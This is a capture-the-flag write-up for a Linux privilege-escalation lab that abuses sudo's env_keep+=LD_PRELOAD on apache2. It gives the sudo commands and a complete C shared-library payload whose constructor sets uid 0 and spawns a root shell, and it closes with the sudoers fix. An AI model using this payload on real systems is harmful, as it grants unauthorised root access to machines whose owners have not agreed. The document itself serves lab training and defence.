This is the first write-up I could find online for Linux Priv Esc, Load Order Matters, if that’s true and my Google skills don’t suck, sweet! 🙂 Load Order Matters is a privilege escalation challenge in the AttackDefense.com intermediate category.

So, what’s the deal?

Challenge Info

So you’ve got a foothold on a regular user account on a Linux box? You’ve tried to escalate privileges to root but nothing seems to work? Remember the order in which programs, scripts and libraries load dictates what executes!

Your mission is to get a root shell on the box! 

Mission Accepted

So, I know I am looking to exploit something via library load order, so I go about trying to find which binary. sudo -l for the quick win…

student@attackdefense:/tmp$ sudo -l
Matching Defaults entries for student on attackdefense:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, env_keep+=LD_PRELOAD

User student may run the following commands on attackdefense:
    (root) NOPASSWD: /usr/sbin/apache2

Let’s try it…

student@attackdefense:/tmp$ sudo /usr/sbin/apache2
[Mon Mar 25 21:31:48.463122 2019] [core:warn] [pid 186] AH00111: Config variable ${APACHE_RUN_DIR} is not defined
apache2: Syntax error on line 80 of /etc/apache2/apache2.conf: DefaultRuntimeDir must be a valid directory, absolute or relative to ServerRoot

We get an error: apache2 expects some environment variables (APACHE_RUN_DIR and friends) that are not set, so it bails out while parsing its config. That doesn’t matter for what we’re about to do, but let’s look at the sudo -l output again.

env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, env_keep+=LD_PRELOAD

All the info we need is here. We can’t inject arbitrary environment variables because env_reset wipes the environment before the command runs, and secure_path means we can’t hijack PATH either, but sudo has been told to preserve one variable through the reset: env_keep+=LD_PRELOAD. Awesome!

What is LD_PRELOAD?

Normally the Linux dynamic loader ld-linux (see the ld.so(8) man page) finds and loads the shared libraries needed by a program, prepares the program to run, and then runs it. The shared libraries (shared objects) are loaded in whatever order the loader needs them in to resolve symbols.

LD_PRELOAD is an optional environment variable containing one or more paths to shared libraries (shared objects) that the loader will load before any other shared library, including the C runtime library (libc.so). This is called preloading a library.

Preloading a library means that its functions take precedence over functions of the same name in libraries loaded later. This lets library functions be intercepted and replaced (overridden), so program behavior can be modified non-invasively, i.e. without a recompile. One caveat worth knowing: for setuid/setgid binaries the loader runs in secure-execution mode and ignores LD_PRELOAD entries that contain a slash, so you cannot preload into sudo itself. That’s not a problem here, because sudo passes the variable on to apache2, which is a normal binary simply being run as root.

The Escalation

If you read the above, not only should you get LD_PRELOAD but you should also be jumping up and down about what we are about to do next.

First, create the shared object source file…

student@attackdefense:/tmp$ vi ld-preload.c

Compile payload on target, in /tmp…

student@attackdefense:/tmp$  gcc -fPIC -shared -o /tmp/root.so ld-preload.c -nostartfiles

You will get some warnings, ignore them 🙂

Now, run it through sudo to win (without sudo, apache2 and our library would just run as student)…

student@attackdefense:/tmp$ sudo LD_PRELOAD=/tmp/root.so /usr/sbin/apache2
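Since the write-up doesn’t show the contents of ld-preload.c, here is a payload I wrote for this exact situation. It is my own added example, not the author’s file; the source and library names (root-preload.c, /tmp/root.so) and the choice of /bin/sh are assumptions. Instead of defining `_init` and compiling with `-nostartfiles` (which is where the warnings come from), it uses a constructor function, which the loader runs before the target’s `main()`, so apache2 never gets as far as complaining about its config. It also guards against two ways the classic payload misfires: it stays inert unless it was really injected via LD_PRELOAD, and it refuses to replace a non-root process with a useless non-root shell.

```c
/*
 * root-preload.c: an added LD_PRELOAD payload for the sudo env_keep+=LD_PRELOAD
 * case. This is my own example, not the ld-preload.c from the original
 * write-up; the file and library names are assumptions.
 *
 * Build:  gcc -fPIC -shared -o /tmp/root.so root-preload.c
 * Use:    sudo LD_PRELOAD=/tmp/root.so /usr/sbin/apache2
 */
#define _GNU_SOURCE
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>

#define PRELOAD_VAR "LD_PRELOAD"
#define SHELL "/bin/sh"

/*
 * Decide whether to escalate. Fire only when the library was really injected
 * through LD_PRELOAD (so the .so stays inert if it is loaded any other way)
 * and the process is already root (swapping an unprivileged apache2 for a
 * non-root shell gains nothing and burns the attempt).
 */
int should_fire(const char *ld_preload, uid_t euid)
{
    return ld_preload != NULL && ld_preload[0] != '\0' && euid == 0;
}

/*
 * Remove LD_PRELOAD from the environment so the shell we spawn does not
 * re-inject this library into every command it runs. Returns 1 if the
 * variable was present and removed, 0 if there was nothing to remove.
 */
int strip_preload(void)
{
    if (getenv(PRELOAD_VAR) == NULL)
        return 0;
    unsetenv(PRELOAD_VAR);
    return 1;
}

/*
 * The loader runs a preloaded object's constructors before the target's
 * main(), so this executes before apache2 parses its config and before it
 * can complain about APACHE_RUN_DIR.
 */
__attribute__((constructor))
static void preload_init(void)
{
    if (!should_fire(getenv(PRELOAD_VAR), geteuid()))
        return;

    strip_preload();

    /* Under sudo the real uid is already 0, so these are no-ops; they matter
       only if the target started with euid 0 but a non-zero real uid. */
    if (setgid(0) != 0 || setuid(0) != 0)
        return;

    /* "-p" stops the shell from dropping privileges if uid != euid. */
    execl(SHELL, "sh", "-p", (char *)NULL);
    /* Only reached if exec failed: fall through and let the target run. */
}
```

Either `sudo LD_PRELOAD=/tmp/root.so /usr/sbin/apache2` or `LD_PRELOAD=/tmp/root.so sudo /usr/sbin/apache2` works: in the second form the loader ignores the variable for the setuid sudo binary itself, but sudo still sees it in its environment and, thanks to env_keep, passes it to the child. The fix on the defending side is equally simple: drop `env_keep+=LD_PRELOAD` (and any other `LD_*` variable) from sudoers; sudo’s env_reset already strips them by default.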